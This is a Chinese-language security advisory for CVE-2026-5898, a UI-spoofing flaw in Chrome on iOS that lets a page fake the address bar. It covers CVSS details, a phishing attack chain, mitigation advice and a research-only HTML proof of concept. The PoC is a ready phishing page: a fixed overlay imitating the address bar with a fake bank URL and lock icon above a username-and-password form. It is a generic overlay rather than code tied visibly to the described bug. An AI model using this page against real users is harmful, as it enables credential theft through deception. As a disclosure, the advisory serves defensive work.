CVE-2026-5898 Google Chrome iOS UI欺骗漏洞

漏洞信息

漏洞编号

CVE-2026-5898

漏洞类型

UI欺骗

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Google Chrome on iOS

漏洞概述

Google Chrome on iOS 在 147.0.7727.55 之前的版本存在安全 UI 显示不当漏洞。该漏洞源于 Omnibox（地址栏）的渲染机制缺陷，允许远程攻击者通过精心制作的 HTML 页面实施 UI 欺骗。攻击者可利用此漏洞伪造合法网站地址栏，诱导用户误信当前页面为受信任站点。虽然该漏洞需要用户交互，但在无需认证的情况下即可触发，可能导致用户敏感信息泄露或遭受网络钓鱼攻击。用户需尽快更新浏览器版本以规避风险。

技术细节

该漏洞主要影响 iOS 平台的 Google Chrome 浏览器，其核心在于 Omnibox（地址栏）的安全 UI 渲染逻辑存在缺陷。在特定版本的 Chrome（147.0.7727.55 之前）中，当浏览器处理包含特定 CSS 样式或 HTML 结构的恶意页面时，未能正确隔离安全 UI 层与网页内容层。攻击者可以利用这一缺陷，通过精心构造的 HTML 页面，在视觉上覆盖或伪造地址栏区域。由于攻击无需认证（PR:N）且利用难度低（AC:L），一旦用户访问该恶意页面并进行交互（如点击、滚动），攻击者即可实施 UI 欺骗攻击。这种欺骗可以隐藏真实的恶意 URL，显示伪造的合法网址（如银行登录页），从而诱导用户输入凭据或下载恶意软件。虽然该漏洞对机密性（C:N）和可用性（A:N）无直接影响，但严重破坏了信息的完整性（I:L）和用户对浏览器的信任。

攻击链分析

STEP 1

Step 1: Preparation

攻击者精心制作一个包含恶意 HTML 和 CSS 的页面，该页面能够伪造浏览器地址栏（Omnibox）的外观。

STEP 2

Step 2: Delivery

攻击者通过网络钓鱼邮件、短信或即时消息将恶意链接发送给目标用户。

STEP 3

Step 3: Exploitation

用户在受影响的 iOS 版 Chrome 浏览器中点击链接并访问页面。由于漏洞，浏览器未能正确显示真实的安全 UI，而是渲染了攻击者伪造的界面。

STEP 4

Step 4: Deception

用户看到伪造的地址栏（显示合法 URL），误认为当前环境安全，从而放松警惕。

STEP 5

Step 5: Impact

用户在伪造的页面上输入敏感信息（如账号密码）或执行操作，导致信息泄露或完整性受损。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- PoC for Chrome iOS UI Spoofing -->
<!-- This demonstrates a fake address bar overlay -->
<!DOCTYPE html>
<html>
<head>
<style>
  body {
    margin: 0;
    padding-top: 60px; /* Offset for fake bar */
    font-family: sans-serif;
  }
  #fake-omnibox {
    position: fixed;
    top: 0;
    left: 0;
    right: 0;
    height: 60px;
    background-color: #ffffff;
    border-bottom: 1px solid #dcdcdc;
    display: flex;
    align-items: center;
    padding: 0 15px;
    box-shadow: 0 2px 5px rgba(0,0,0,0.1);
    z-index: 9999;
  }
  .lock-icon {
    color: #5f6368;
    margin-right: 10px;
    font-size: 14px;
  }
  .fake-url-bar {
    background-color: #f1f3f4;
    border-radius: 20px;
    padding: 8px 15px;
    flex-grow: 1;
    color: #202124;
    font-size: 14px;
    text-align: center;
  }
</style>
</head>
<body>
  <!-- Simulated Browser UI -->
  <div id="fake-omnibox">
    <span class="lock-icon">🔒</span>
    <div class="fake-url-bar">https://www.secure-bank.com/login</div>
  </div>

  <!-- Malicious Content -->
  <div style="padding: 20px;">
    <h2>Account Verification</h2>
    <p>Please confirm your identity to continue.</p>
    <input type="text" placeholder="Username" style="width: 100%; padding: 10px; margin-bottom: 10px;">
    <input type="password" placeholder="Password" style="width: 100%; padding: 10px; margin-bottom: 10px;">
    <button style="width: 100%; padding: 10px; background: #1a73e8; color: white; border: none;">Login</button>
  </div>
</body>
</html>

影响范围

Google Chrome on iOS < 147.0.7727.55

防御指南

临时缓解措施

对于无法立即更新浏览器的用户，建议在 iOS 版 Chrome 中谨慎浏览。用户可以通过观察页面滚动时顶部元素是否跟随滚动来初步判断是否存在伪造地址栏。企业用户应部署移动设备管理（MDM）解决方案，强制执行浏览器更新策略或阻止旧版本浏览器的网络访问，以降低潜在风险。